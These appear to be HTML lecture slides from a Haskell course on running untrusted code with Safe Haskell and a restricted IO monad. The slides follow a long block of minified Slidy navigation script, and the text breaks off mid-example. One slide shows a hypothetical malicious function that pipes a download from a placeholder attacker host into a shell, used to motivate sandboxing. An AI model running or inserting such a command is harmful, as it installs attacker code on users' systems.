a;if(w3c_slidy.slide_number!=0){a=w3c_slidy.slides[w3c_slidy.slide_number];w3c_slidy.hide_slide(a);w3c_slidy.slide_number=0;a=w3c_slidy.slides[w3c_slidy.slide_number];w3c_slidy.last_shown=null;w3c_slidy.set_visibility_all_incremental("hidden");w3c_slidy.show_slide(a)}w3c_slidy.set_eos_status(!w3c_slidy.next_incremental_item(w3c_slidy.last_shown));w3c_slidy.set_location()}},last_slide:function(){if(!w3c_slidy.view_all){var a;w3c_slidy.last_shown=null;if(w3c_slidy.last_shown==null&&w3c_slidy.slide_number<w3c_slidy.slides.length-1){a=w3c_slidy.slides[w3c_slidy.slide_number];w3c_slidy.hide_slide(a);w3c_slidy.slide_number=w3c_slidy.slides.length-1;a=w3c_slidy.slides[w3c_slidy.slide_number];w3c_slidy.set_visibility_all_incremental("visible");w3c_slidy.last_shown=w3c_slidy.previous_incremental_item(null);w3c_slidy.show_slide(a)}else{w3c_slidy.set_visibility_all_incremental("visible");w3c_slidy.last_shown=w3c_slidy.previous_incremental_item(null)}w3c_slidy.set_eos_status(true);w3c_slidy.set_location()}},set_eos_status:function(a){if(this.eos){this.eos.style.color=(a?"rgb(240,240,240)":"red")}},goto_slide:function(b){var a=w3c_slidy.slides[w3c_slidy.slide_number];w3c_slidy.hide_slide(a);w3c_slidy.slide_number=b;a=w3c_slidy.slides[w3c_slidy.slide_number];w3c_slidy.last_shown=null;w3c_slidy.set_visibility_all_incremental("hidden");w3c_slidy.set_eos_status(!w3c_slidy.next_incremental_item(w3c_slidy.last_shown));document.title=w3c_slidy.title+" ("+(w3c_slidy.slide_number+1)+")";w3c_slidy.show_slide(a);w3c_slidy.show_slide_number()},show_slide:function(a){this.sync_background(a);window.scrollTo(0,0);this.remove_class(a,"hidden")},hide_slide:function(a){this.add_class(a,"hidden")},sync_background:function(a){var e;var g;if(a.currentStyle){g=a.currentStyle.backgroundColor}else{if(document.defaultView){var f=document.defaultView.getComputedStyle(a,null);if(f){g=f.getPropertyValue("background-color")}else{g="transparent"}}else{g=="transparent"}}if(g=="transparent"||g.indexOf("rgba")>=0||g.indexOf("opacity")>=0){var c=this.get_class_list(a);for(var d=0;d<this.backgrounds.length;d++){e=this.backgrounds[d];var b=this.get_class_list(e);if(this.matching_background(c,b)){this.remove_class(e,"hidden")}else{this.add_class(e,"hidden")}}}else{this.hide_backgrounds()}},hide_backgrounds:function(){for(var a=0;a<this.backgrounds.length;a++){background=this.backgrounds[a];this.add_class(background,"hidden")}},matching_background:function(c,b){var d,e,f,a;f=/\w+/g;a=b.match(f);for(d=e=0;d<a.length;d++){if(a[d]=="hidden"){continue}if(a[d]=="background"){continue}++e}if(e==0){return true}a=c.match(f);for(d=e=0;d<a.length;d++){if(a[d]=="hidden"){continue}if(this.has_token(b,a[d])){return true}}return false},resized:function(){var c=0;if(typeof(window.innerWidth)=="number"){c=window.innerWidth}else{if(document.documentElement&&document.documentElement.clientWidth){c=document.documentElement.clientWidth}else{if(document.body&&document.body.clientWidth){c=document.body.clientWidth}}}var b=0;if(typeof(window.innerHeight)=="number"){b=window.innerHeight}else{if(document.documentElement&&document.documentElement.clientHeight){b=document.documentElement.clientHeight}else{if(document.body&&document.body.clientHeight){b=document.body.clientHeight}}}if(b&&(c/b>1.05*1024/768)){c=b*1024/768}if(c!=w3c_slidy.last_width||b!=w3c_slidy.last_height){if(c>=1100){w3c_slidy.size_index=5}else{if(c>=1000){w3c_slidy.size_index=4}else{if(c>=800){w3c_slidy.size_index=3}else{if(c>=600){w3c_slidy.size_index=2}else{if(c){w3c_slidy.size_index=0}}}}}if(0<=w3c_slidy.size_index+w3c_slidy.size_adjustment&&w3c_slidy.size_index+w3c_slidy.size_adjustment<w3c_slidy.sizes.length){w3c_slidy.size_index=w3c_slidy.size_index+w3c_slidy.size_adjustment}w3c_slidy.adjust_object_dimensions(c,b);if(document.body.style.fontSize!=w3c_slidy.sizes[w3c_slidy.size_index]){document.body.style.fontSize=w3c_slidy.sizes[w3c_slidy.size_index]}w3c_slidy.last_width=c;w3c_slidy.last_height=b;if(w3c_slidy.ns_pos){var a=w3c_slidy.slides[w3c_slidy.slide_number];w3c_slidy.hide_slide(a);w3c_slidy.show_slide(a)}w3c_slidy.refresh_toolbar(200)}},scrolled:function(){if(w3c_slidy.toolbar&&!w3c_slidy.ns_pos&&!w3c_slidy.ie7){w3c_slidy.hack_offset=w3c_slidy.scroll_x_offset();w3c_slidy.toolbar.style.display="none";if(w3c_slidy.scrollhack==0&&!w3c_slidy.view_all){setTimeout(function(){w3c_slidy.show_toolbar()},1000);w3c_slidy.scrollhack=1}}},hide_toolbar:function(){w3c_slidy.add_class(w3c_slidy.toolbar,"hidden");window.focus()},refresh_toolbar:function(a){if(!w3c_slidy.ns_pos&&!w3c_slidy.ie7){w3c_slidy.hide_toolbar();setTimeout(function(){w3c_slidy.show_toolbar()},a)}},show_toolbar:function(){if(w3c_slidy.want_toolbar){w3c_slidy.toolbar.style.display="block";if(!w3c_slidy.ns_pos){var b=w3c_slidy.scroll_x_offset();w3c_slidy.toolbar.style.left=b;w3c_slidy.toolbar.style.right=b;w3c_slidy.toolbar.style.bottom=0}w3c_slidy.remove_class(w3c_slidy.toolbar,"hidden")}w3c_slidy.scrollhack=0;try{if(!w3c_slidy.opera){w3c_slidy.help_anchor.focus()}}catch(a){}},toggle_toolbar:function(){if(!w3c_slidy.view_all){if(w3c_slidy.has_class(w3c_slidy.toolbar,"hidden")){w3c_slidy.remove_class(w3c_slidy.toolbar,"hidden");w3c_slidy.want_toolbar=1}else{w3c_slidy.add_class(w3c_slidy.toolbar,"hidden");w3c_slidy.want_toolbar=0}}},scroll_x_offset:function(){if(window.pageXOffset){return self.pageXOffset}if(document.documentElement&&document.documentElement.scrollLeft){return document.documentElement.scrollLeft}if(document.body){return document.body.scrollLeft}return 0},scroll_y_offset:function(){if(window.pageYOffset){return self.pageYOffset}if(document.documentElement&&document.documentElement.scrollTop){return document.documentElement.scrollTop}if(document.body){return document.body.scrollTop}return 0},optimize_font_size:function(){var a=w3c_slidy.slides[w3c_slidy.slide_number];var d=a.scrollHeight;var b=getWindowHeight();var c=100*d/b;alert("window utilization = "+c+"% (doc "+d+" win "+b+")")},get_doc_height:function(a){if(!a){a=document}if(a&&a.body&&a.body.offsetHeight){return a.body.offsetHeight}if(a&&a.body&&a.body.scrollHeight){return a.body.scrollHeight}alert("couldn't determine document height")},get_window_height:function(){if(typeof(window.innerHeight)=="number"){return window.innerHeight}if(document.documentElement&&document.documentElement.clientHeight){return document.documentElement.clientHeight}if(document.body&&document.body.clientHeight){return document.body.clientHeight}},document_height:function(){var a,b;a=document.body.scrollHeight;b=document.body.offsetHeight;if(a&&b){return(a>b?a:b)}return 0},smaller:function(){if(w3c_slidy.size_index>0){--w3c_slidy.size_index}w3c_slidy.toolbar.style.display="none";document.body.style.fontSize=w3c_slidy.sizes[w3c_slidy.size_index];var a=w3c_slidy.slides[w3c_slidy.slide_number];w3c_slidy.hide_slide(a);w3c_slidy.show_slide(a);setTimeout(function(){w3c_slidy.show_toolbar()},50)},bigger:function(){if(w3c_slidy.size_index<w3c_slidy.sizes.length-1){++w3c_slidy.size_index}w3c_slidy.toolbar.style.display="none";document.body.style.fontSize=w3c_slidy.sizes[w3c_slidy.size_index];var a=w3c_slidy.slides[w3c_slidy.slide_number];w3c_slidy.hide_slide(a);w3c_slidy.show_slide(a);setTimeout(function(){w3c_slidy.show_toolbar()},50)},adjust_object_dimensions:function(c,k){for(var e=0;e<w3c_slidy.objects.length;e++){var d=this.objects[e];var b=d.getAttribute("type");if(b=="image/svg+xml"||b=="application/x-shockwave-flash"){if(!d.initialWidth){d.initialWidth=d.getAttribute("width")}if(!d.initialHeight){d.initialHeight=d.getAttribute("height")}if(d.initialWidth&&d.initialWidth.charAt(d.initialWidth.length-1)=="%"){var j=parseInt(d.initialWidth.slice(0,d.initialWidth.length-1));var a=c*(j/100);d.setAttribute("width",a)}if(d.initialHeight&&d.initialHeight.charAt(d.initialHeight.length-1)=="%"){var f=parseInt(d.initialHeight.slice(0,d.initialHeight.length-1));var g=k*(f/100);d.setAttribute("height",g)}}}},key_press:function(a){if(!a){a=window.event}if(!w3c_slidy.key_wanted){return w3c_slidy.cancel(a)}return true},key_down:function(d){var c,e,a;w3c_slidy.key_wanted=true;if(!d){d=window.event}if(window.event){c=window.event.keyCode;e=window.event.srcElement}else{if(d.which){c=d.which;e=d.target}else{return true}}if(!c){return true}if(!w3c_slidy.slidy_chrome(e)&&w3c_slidy.special_element(e)){return true}if(d.ctrlKey||d.altKey||d.metaKey){return true}if(w3c_slidy.is_shown_toc()&&c!=9&&c!=16&&c!=38&&c!=40){w3c_slidy.hide_table_of_contents(true);if(c==27||c==84||c==67){return w3c_slidy.cancel(d)}}if(c==34){if(w3c_slidy.view_all){return true}w3c_slidy.next_slide(false);return w3c_slidy.cancel(d)}else{if(c==33){if(w3c_slidy.view_all){return true}w3c_slidy.previous_slide(false);return w3c_slidy.cancel(d)}else{if(c==32){w3c_slidy.next_slide(true);return w3c_slidy.cancel(d)}else{if(c==37){w3c_slidy.previous_slide(!d.shiftKey);return w3c_slidy.cancel(d)}else{if(c==36){w3c_slidy.first_slide();return w3c_slidy.cancel(d)}else{if(c==35){w3c_slidy.last_slide();return w3c_slidy.cancel(d)}else{if(c==39){w3c_slidy.next_slide(!d.shiftKey);return w3c_slidy.cancel(d)}else{if(c==13){if(w3c_slidy.outline){if(w3c_slidy.outline.visible){w3c_slidy.fold(w3c_slidy.outline)}else{w3c_slidy.unfold(w3c_slidy.outline)}return w3c_slidy.cancel(d)}}else{if(c==188){w3c_slidy.smaller();return w3c_slidy.cancel(d)}else{if(c==190){w3c_slidy.bigger();return w3c_slidy.cancel(d)}else{if(c==189||c==109){w3c_slidy.smaller();return w3c_slidy.cancel(d)}else{if(c==187||c==191||c==107){w3c_slidy.bigger();return w3c_slidy.cancel(d)}else{if(c==83){w3c_slidy.smaller();return w3c_slidy.cancel(d)}else{if(c==66){w3c_slidy.bigger();return w3c_slidy.cancel(d)}else{if(c==90){w3c_slidy.last_slide();return w3c_slidy.cancel(d)}else{if(c==70){w3c_slidy.toggle_toolbar();return w3c_slidy.cancel(d)}else{if(c==65){w3c_slidy.toggle_view();return w3c_slidy.cancel(d)}else{if(c==75){w3c_slidy.mouse_click_enabled=!w3c_slidy.mouse_click_enabled;var b=(w3c_slidy.mouse_click_enabled?"enabled":"disabled")+" mouse click advance";alert(w3c_slidy.localize(b));return w3c_slidy.cancel(d)}else{if(c==84||c==67){if(w3c_slidy.toc){w3c_slidy.toggle_table_of_contents()}return w3c_slidy.cancel(d)}else{if(c==72){window.location=w3c_slidy.help_page;return w3c_slidy.cancel(d)}}}}}}}}}}}}}}}}}}}}return true},create_element:function(a){if(this.xhtml&&(typeof document.createElementNS!="undefined")){return document.createElementNS("http://www.w3.org/1999/xhtml",a)}return document.createElement(a)},get_element_style:function(d,b,c){if(d.currentStyle){return d.currentStyle[b]}else{if(window.getComputedStyle){var a=window.getComputedStyle(d,"");return a.getPropertyValue(c)}}return""},has_token:function(e,c){if(e){var d=/\w+/g;var a=e.match(d);for(var b=0;b<a.length;b++){if(a[b]==c){return true}}}return false},get_class_list:function(a){if(typeof a.className!="undefined"){return a.className}return a.getAttribute("class")},has_class:function(b,a){if(b.nodeType!=1){return false}var c=new RegExp("(^| )"+a+"W*");if(typeof b.className!="undefined"){return c.test(b.className)}return c.test(b.getAttribute("class"))},remove_class:function(b,a){var d=new RegExp("(^| )"+a+"W*");var c="";if(typeof b.className!="undefined"){c=b.className;if(c){c=c.replace(d,"");b.className=c}}else{c=b.getAttribute("class");if(c){c=c.replace(d,"");b.setAttribute("class",c)}}},add_class:function(b,a){if(!this.has_class(b,a)){if(typeof b.className!="undefined"){b.className+=" "+a}else{var c=b.getAttribute("class");c=c?c+" "+a:a;b.setAttribute("class",c)}}},incremental_elements:null,okay_for_incremental:function(a){if(!this.incremental_elements){var b=new Array();b.p=true;b.pre=true;b.li=true;b.blockquote=true;b.dt=true;b.dd=true;b.h2=true;b.h3=true;b.h4=true;b.h5=true;b.h6=true;b.span=true;b.address=true;b.table=true;b.tr=true;b.th=true;b.td=true;b.img=true;b.object=true;this.incremental_elements=b}return this.incremental_elements[a.toLowerCase()]},next_incremental_item:function(c){var b=this.is_xhtml?"br":"BR";var a=w3c_slidy.slides[w3c_slidy.slide_number];for(;;){c=w3c_slidy.next_node(a,c);if(c==null||c.parentNode==null){break}if(c.nodeType==1){if(c.nodeName==b){continue}if(w3c_slidy.has_class(c,"incremental")&&w3c_slidy.okay_for_incremental(c.nodeName)){return c}if(w3c_slidy.has_class(c.parentNode,"incremental")&&!w3c_slidy.has_class(c,"non-incremental")){return c}}}return c},previous_incremental_item:function(c){var b=this.is_xhtml?"br":"BR";var a=w3c_slidy.slides[w3c_slidy.slide_number];for(;;){c=w3c_slidy.previous_node(a,c);if(c==null||c.parentNode==null){break}if(c.nodeType==1){if(c.nodeName==b){continue}if(w3c_slidy.has_class(c,"incremental")&&w3c_slidy.okay_for_incremental(c.nodeName)){return c}if(w3c_slidy.has_class(c.parentNode,"incremental")&&!w3c_slidy.has_class(c,"non-incremental")){return c}}}return c},set_visibility_all_incremental:function(b){var a=this.next_incremental_item(null);if(b=="hidden"){while(a){w3c_slidy.add_class(a,"invisible");a=w3c_slidy.next_incremental_item(a)}}else{while(a){w3c_slidy.remove_class(a,"invisible");a=w3c_slidy.next_incremental_item(a)}}},reveal_next_item:function(a){a=w3c_slidy.next_incremental_item(a);if(a&&a.nodeType==1){w3c_slidy.remove_class(a,"invisible")}return a},hide_previous_item:function(a){if(a&&a.nodeType==1){w3c_slidy.add_class(a,"invisible")}return this.previous_incremental_item(a)},next_node:function(a,b){if(b==null){return a.firstChild}if(b.firstChild){return b.firstChild}if(b.nextSibling){return b.nextSibling}for(;;){b=b.parentNode;if(!b||b==a){break}if(b&&b.nextSibling){return b.nextSibling}}return null},previous_node:function(a,b){if(b==null){b=a.lastChild;if(b){while(b.lastChild){b=b.lastChild}}return b}if(b.previousSibling){b=b.previousSibling;while(b.lastChild){b=b.lastChild}return b}if(b.parentNode!=a){return b.parentNode}return null},previous_sibling_element:function(a){a=a.previousSibling;while(a&&a.nodeType!=1){a=a.previousSibling}return a},next_sibling_element:function(a){a=a.nextSibling;while(a&&a.nodeType!=1){a=a.nextSibling}return a},first_child_element:function(a){var b;for(b=a.firstChild;b;b=b.nextSibling){if(b.nodeType==1){break}}return b},first_tag:function(b,a){var c;if(!this.is_xhtml){a=a.toUpperCase()}for(c=b.firstChild;c;c=c.nextSibling){if(c.nodeType==1&&c.nodeName==a){break}}return c},hide_selection:function(){if(window.getSelection){var b=window.getSelection();if(b.rangeCount>0){var a=b.getRangeAt(0);a.collapse(false)}}else{var c=document.selection.createRange();c.collapse(false)}},get_selected_text:function(){try{if(window.getSelection){return window.getSelection().toString()}if(document.getSelection){return document.getSelection().toString()}if(document.selection){return document.selection.createRange().text}}catch(a){}return""},mouse_button_up:function(a){w3c_slidy.selected_text_len=w3c_slidy.get_selected_text().length},mouse_button_click:function(g){var c=false;var b=false;var d=false;var f;if(!g){var g=window.event}if(g.target){f=g.target}else{if(g.srcElement){f=g.srcElement}}if(f.nodeType==3){f=f.parentNode}if(g.which){b=(g.which==1);d=(g.which==2);c=(g.which==3)}else{if(g.button){if(g.button==4){d=true}c=(g.button==2)}else{b=true}}if(w3c_slidy.selected_text_len>0){w3c_slidy.stop_propagation(g);g.cancel=true;g.returnValue=false;return false}w3c_slidy.hide_table_of_contents(false);var a=f.nodeName.toLowerCase();if(w3c_slidy.mouse_click_enabled&&b&&!w3c_slidy.special_element(f)&&!f.onclick){w3c_slidy.next_slide(true);w3c_slidy.stop_propagation(g);g.cancel=true;g.returnValue=false;return false}return true},special_element:function(b){var a=b.nodeName.toLowerCase();return b.onkeydown||b.onclick||a=="a"||a=="embed"||a=="object"||a=="video"||a=="audio"||a=="input"||a=="textarea"||a=="select"||a=="option"},slidy_chrome:function(a){while(a){if(a==w3c_slidy.toc||a==w3c_slidy.toolbar||w3c_slidy.has_class(a,"outline")){return true}a=a.parentNode}return false},get_key:function(b){var a;if(typeof window.event!="undefined"){a=window.event.keyCode}else{if(b.which){a=b.which}}return a},get_target:function(b){var a;if(!b){b=window.event}if(b.target){a=b.target}else{if(b.srcElement){a=b.srcElement}}if(a.nodeType!=1){a=a.parentNode}return a},is_block:function(b){var a=b.nodeName.toLowerCase();return a=="ol"||a=="ul"||a=="p"||a=="li"||a=="table"||a=="pre"||a=="h1"||a=="h2"||a=="h3"||a=="h4"||a=="h5"||a=="h6"||a=="blockquote"||a=="address"},add_listener:function(a,c,b){if(window.addEventListener){a.addEventListener(c,b,false)}else{a.attachEvent("on"+c,b)}},stop_propagation:function(a){a=a?a:window.event;a.cancelBubble=true;if(a.stopPropagation){a.stopPropagation()}return true},cancel:function(a){if(a){a.cancel=true;a.returnValue=false;if(a.preventDefault){a.preventDefault()}}w3c_slidy.key_wanted=false;return false},strings_es:{slide:"pág.","help?":"Ayuda","contents?":"Índice","table of contents":"tabla de contenidos","Table of Contents":"Tabla de Contenidos","restart presentation":"Reiniciar presentación","restart?":"Inicio"},help_es:"Utilice el ratón, barra espaciadora, teclas Izda/Dcha, o Re pág y Av pág. Use S y B para cambiar el tamaño de fuente.",strings_ca:{slide:"pàg..","help?":"Ajuda","contents?":"Índex","table of contents":"taula de continguts","Table of Contents":"Taula de Continguts","restart presentation":"Reiniciar presentació","restart?":"Inici"},help_ca:"Utilitzi el ratolí, barra espaiadora, tecles Esq./Dta. o Re pàg y Av pàg. Usi S i B per canviar grandària de font.",strings_cs:{slide:"snímek","help?":"nápověda","contents?":"obsah","table of contents":"obsah prezentace","Table of Contents":"Obsah prezentace","restart presentation":"znovu spustit prezentaci","restart?":"restart"},help_cs:"Prezentaci můžete procházet pomocí kliknutí myši, mezerníku, šipek vlevo a vpravo nebo kláves PageUp a PageDown. Písmo se dá zvětšit a zmenšit pomocí kláves B a S.",strings_nl:{slide:"pagina","help?":"Help?","contents?":"Inhoud?","table of contents":"inhoudsopgave","Table of Contents":"Inhoudsopgave","restart presentation":"herstart presentatie","restart?":"Herstart?"},help_nl:"Navigeer d.m.v. het muis, spatiebar, Links/Rechts toetsen, of PgUp en PgDn. Gebruik S en B om de karaktergrootte te veranderen.",strings_de:{slide:"Seite","help?":"Hilfe","contents?":"Übersicht","table of contents":"Inhaltsverzeichnis","Table of Contents":"Inhaltsverzeichnis","restart presentation":"Präsentation neu starten","restart?":"Neustart"},help_de:"Benutzen Sie die Maus, Leerschlag, die Cursortasten links/rechts oder Page up/Page Down zum Wechseln der Seiten und S und B für die Schriftgrösse.",strings_pl:{slide:"slajd","help?":"pomoc?","contents?":"spis treści?","table of contents":"spis treści","Table of Contents":"Spis Treści","restart presentation":"Restartuj prezentację","restart?":"restart?"},help_pl:"Zmieniaj slajdy klikając myszą, naciskając spację, strzałki lewo/prawolub PgUp / PgDn. Użyj klawiszy S i B, aby zmienić rozmiar czczionki.",strings_fr:{slide:"page","help?":"Aide","contents?":"Index","table of contents":"table des matières","Table of Contents":"Table des matières","restart presentation":"Recommencer l'exposé","restart?":"Début"},help_fr:"Naviguez avec la souris, la barre d'espace, les flèches gauche/droite ou les touches Pg Up, Pg Dn. Utilisez les touches S et B pour modifier la taille de la police.",strings_hu:{slide:"oldal","help?":"segítség","contents?":"tartalom","table of contents":"tartalomjegyzék","Table of Contents":"Tartalomjegyzék","restart presentation":"bemutató újraindítása","restart?":"újraindítás"},help_hu:"Az oldalak közti lépkedéshez kattintson az egérrel, vagy használja a szóköz, a bal, vagy a jobb nyíl, illetve a Page Down, Page Up billentyűket. Az S és a B billentyűkkel változtathatja a szöveg méretét.",strings_it:{slide:"pag.","help?":"Aiuto","contents?":"Indice","table of contents":"indice","Table of Contents":"Indice","restart presentation":"Ricominciare la presentazione","restart?":"Inizio"},help_it:"Navigare con mouse, barra spazio, frecce sinistra/destra o PgUp e PgDn. Usare S e B per cambiare la dimensione dei caratteri.",strings_el:{slide:"σελίδα","help?":"βοήθεια;","contents?":"περιεχόμενα;","table of contents":"πίνακας περιεχομένων","Table of Contents":"Πίνακας Περιεχομένων","restart presentation":"επανεκκίνηση παρουσίασης","restart?":"επανεκκίνηση;"},help_el:"Πλοηγηθείτε με το κλίκ του ποντικιού, το space, τα βέλη αριστερά/δεξιά, ή Page Up και Page Down. Χρησιμοποιήστε τα πλήκτρα S και B για να αλλάξετε το μέγεθος της γραμματοσειράς.",strings_ja:{slide:"スライド","help?":"ヘルプ","contents?":"目次","table of contents":"目次を表示","Table of Contents":"目次","restart presentation":"最初から再生","restart?":"最初から"},help_ja:"マウス左クリック ・ スペース ・ 左右キー または Page Up ・ Page Downで操作， S ・ Bでフォントサイズ変更",strings_zh:{slide:"幻灯片","help?":"帮助?","contents?":"内容?","table of contents":"目录","Table of Contents":"目录","restart presentation":"重新启动展示","restart?":"重新启动?"},help_zh:"用鼠标点击, 空格条, 左右箭头, Pg Up 和 Pg Dn 导航. 用 S, B 改变字体大小.",strings_ru:{slide:"слайд","help?":"помощь?","contents?":"содержание?","table of contents":"оглавление","Table of Contents":"Оглавление","restart presentation":"перезапустить презентацию","restart?":"перезапуск?"},help_ru:"Перемещайтесь кликая мышкой, используя клавишу пробел, стрелкивлево/вправо или Pg Up и Pg Dn. Клавиши S и B меняют размер шрифта.",strings_sv:{slide:"sida","help?":"hjälp","contents?":"innehåll","table of contents":"innehållsförteckning","Table of Contents":"Innehållsförteckning","restart presentation":"visa presentationen från början","restart?":"börja om"},help_sv:"Bläddra med ett klick med vänstra musknappen, mellanslagstangenten, vänster- och högerpiltangenterna eller tangenterna Pg Up, Pg Dn. Använd tangenterna S och B för att ändra textens storlek.",strings:{},localize:function(d){if(d==""){return d}var b,c=w3c_slidy.strings[w3c_slidy.lang];if(c){b=c[d];if(b){return b}}var a=w3c_slidy.lang.split("-");if(a.length>1){c=w3c_slidy.strings[a[0]];if(c){b=c[d];if(b){return b}}}return d},init_localization:function(){var b=w3c_slidy;var a=w3c_slidy.help_text;this.strings={es:this.strings_es,ca:this.strings_ca,cs:this.strings_cs,nl:this.strings_nl,de:this.strings_de,pl:this.strings_pl,fr:this.strings_fr,hu:this.strings_hu,it:this.strings_it,el:this.strings_el,jp:this.strings_ja,zh:this.strings_zh,ru:this.strings_ru,sv:this.strings_sv},b.strings_es[a]=b.help_es;b.strings_ca[a]=b.help_ca;b.strings_cs[a]=b.help_cs;b.strings_nl[a]=b.help_nl;b.strings_de[a]=b.help_de;b.strings_pl[a]=b.help_pl;b.strings_fr[a]=b.help_fr;b.strings_hu[a]=b.help_hu;b.strings_it[a]=b.help_it;b.strings_el[a]=b.help_el;b.strings_ja[a]=b.help_ja;b.strings_zh[a]=b.help_zh;b.strings_ru[a]=b.help_ru;b.strings_sv[a]=b.help_sv;w3c_slidy.lang=document.body.parentNode.getAttribute("lang");if(!w3c_slidy.lang){w3c_slidy.lang=document.body.parentNode.getAttribute("xml:lang")}if(!w3c_slidy.lang){w3c_slidy.lang="en"}}};if(w3c_slidy.ie6||w3c_slidy.ie7){document.write("<iframe id='historyFrame' src='javascript:\"<html></html>\"' height='1' width='1' style='position:absolute;left:-800px'></iframe>")}w3c_slidy.set_up();setTimeout(w3c_slidy.hide_slides,50);
/*]]>*/
</script>
</head>
<body>
<div class="slide">
<h1 id="administrivia">Administrivia</h1>
<ul>
<li>Bring your laptop Wednesday
<ul>
<li>We are going to try something different</li>
</ul></li>
<li>By now you should have figured out your project partners</li>
<li>Should figure out project by end of week</li>
<li>Schedule a meeting with one of us
<ul>
<li>I am available after 1:15pm tomorrow (Tuesday), and after 2:15pm Wednesday</li>
</ul></li>
</ul>
</div>
<div class="slide">
<h1 id="untrusted-code">Untrusted code</h1>
<ul>
<li>Say you want to incorporate untrusted code in a Haskell application</li>
<li>Example: Some third-party translation software
<ul>
<li>You built a web server</li>
<li>Want to add a &quot;translate to Pig Latin&quot; button to each web page</li>
<li><p>Download some random code with this function</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">toPigLatin </span><span class="ot">::</span> <span class="dt">L.ByteString</span> <span class="ot">-&gt;</span> <span class="dt">L.ByteString</span></code></pre></li>
</ul></li>
<li>If you could trust the type (no <code>IO</code>), this would be safe to run
<ul>
<li>Worst case, users get garbled text on web page</li>
</ul></li>
<li><p>However, what if you have?</p>
<pre class="sourceCode"><code class="sourceCode haskell">toPigLatin <span class="fu">=</span> unsafePerformIO <span class="fu">$</span> <span class="kw">do</span><br />  system <span class="st">&quot;curl evil.org/installbot | sh&quot;</span><br />  <span class="fu">return</span> <span class="st">&quot;Ia owna ouya&quot;</span></code></pre></li>
</ul>
</div>
<div class="slide">
<h1 id="safe-haskell"><a href="http://www.haskell.org/ghc/docs/latest/html/users_guide/safe-haskell.html">Safe Haskell</a></h1>
<ul>
<li>Starting with GHC 7.2, <code>-XSafe</code> option enables <a href="http://www.haskell.org/ghc/docs/latest/html/users_guide/safe-haskell.html">Safe Haskell</a>
<ul>
<li>Courtesy of our very own CA, David Terei</li>
</ul></li>
<li>Safe Haskell disallows import of any unsafe modules
<ul>
<li>E.g., can't import <code>System.IO.Unsafe</code>, so can't call <code>unsafePerformIO</code></li>
</ul></li>
<li><p>Safe imports (enabled by <code>-XSafeImports</code>) require an import to be safe</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">import</span> safe <span class="dt">PigLatin</span> (toPigLatin)</code></pre>
<ul>
<li>The above should guarantee that <code>toPigLatin</code> doesn't call unsafe functions</li>
</ul></li>
<li><p>But wait... doesn't <code>toPigLatin</code> use ByteString?</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="fu">head</span><span class="ot"> </span><span class="ot">::</span> <span class="co">{- Lazy -}</span> <span class="dt">ByteString</span> <span class="ot">-&gt;</span> <span class="dt">Word8</span><br /><span class="fu">head</span> <span class="dt">Empty</span>       <span class="fu">=</span> errorEmptyList <span class="st">&quot;head&quot;</span><br /><span class="fu">head</span> (<span class="dt">Chunk</span> c _) <span class="fu">=</span> S.unsafeHead c<br /><br /><span class="ot">unsafeHead </span><span class="ot">::</span> <span class="co">{- Strict -}</span> <span class="dt">ByteString</span> <span class="ot">-&gt;</span> <span class="dt">Word8</span><br />unsafeHead (<span class="dt">PS</span> x s l) <span class="fu">=</span> assert (l <span class="fu">&gt;</span> <span class="dv">0</span>) <span class="fu">$</span><br />    inlinePerformIO <span class="fu">$</span> withForeignPtr x <span class="fu">$</span> \p <span class="ot">-&gt;</span> peekByteOff p s</code></pre></li>
</ul>
</div>
<div class="slide">
<h1 id="safe-vs.-trustworthy">Safe vs. Trustworthy</h1>
<ul>
<li>A module compiled <code>-XSafe</code> can only import safe modules
<ul>
<li>As if all imports implicitly have <code>safe</code> keyword</li>
</ul></li>
<li>But there are <em>two</em> kinds of safe module
<ol style="list-style-type: decimal">
<li>Modules verified to be safe by the compiler, compiled <code>-XSafe</code></li>
<li>Modules asserted to be safe by the author, compiled <code>-XTrustworthy</code></li>
</ol></li>
<li>So a module like <code>Data.ByteString</code> can be compiled <code>-XTrustworthy</code>
<ul>
<li>Put unsafe functions in separate <code>Data.ByteString.Unsafe</code> module</li>
<li>Assert <code>Data.ByteString</code>'s exported symbols cannot be used unsafely, even if the module internally makes use of unsafe functions</li>
</ul></li>
<li>Of course, might or might not trust module author
<ul>
<li>Can specify on a per-package basis whether to honor <code>-XTrustworthy</code></li>
<li>Use flags, <code>-trust</code> <em>Pkg</em>, <code>-distrust</code> <em>Pkg</em>, <code>-distrust-all-packages</code></li>
<li>Can also set default for a package with <code>ghc-pkg</code></li>
</ul></li>
</ul>
</div>
<div class="slide">
<h1 id="what-if-untrusted-code-needs-to-do-io">What if untrusted code needs to do IO?</h1>
<ul>
<li>Suppose you want to translate to a real language
<ul>
<li>Generally requires massive data sets</li>
<li>Untrusted code would at minimum need to do file IO</li>
<li>Or maybe easiest send text over network to, e.g., Google translate</li>
</ul></li>
<li>Idea: use a <em>restricted</em> IO monad, <code>RIO</code>
<ul>
<li><p>Untrusted third party implements <code>googleTranslate</code> function</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">googleTranslate </span><span class="ot">::</span> <span class="dt">Language</span> <span class="ot">-&gt;</span> <span class="dt">L.ByteString</span> <span class="ot">-&gt;</span> <span class="dt">RIO</span> <span class="dt">L.ByteString</span></code></pre></li>
<li>But uses the <code>RIO</code> monad, instead of <code>IO</code></li>
<li>Implement <code>RIO</code> functions to access network, file system</li>
<li>Have functions reject <em>dangerous</em> operations</li>
<li><p>Can use same names and port <code>IO</code> code to <code>RIO</code> by manipulating imports</p></li>
</ul></li>
</ul>
</div>
<div class="slide">
<h1 id="example-hypothetical-rio-monad">Example: hypothetical <code>RIO</code> monad</h1>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">{-# LANGUAGE Trustworthy #-}</span><br /><span class="kw">module</span> <span class="dt">RIO</span> (<span class="dt">RIO</span>(), runRIO, RIO.readFile) <span class="kw">where</span><br /><br /><span class="co">-- Notice that symbol UnsafeRIO is not exported from this module!</span><br /><span class="kw">newtype</span> <span class="dt">RIO</span> a <span class="fu">=</span> <span class="dt">UnsafeRIO</span> {<span class="ot"> runRIO </span><span class="ot">::</span> <span class="dt">IO</span> a }<br /><span class="kw">instance</span> <span class="kw">Monad</span> <span class="dt">RIO</span> <span class="kw">where</span><br />    <span class="fu">return</span> <span class="fu">=</span> <span class="dt">UnsafeRIO</span> <span class="fu">.</span> <span class="fu">return</span><br />    m <span class="fu">&gt;&gt;=</span> k <span class="fu">=</span> <span 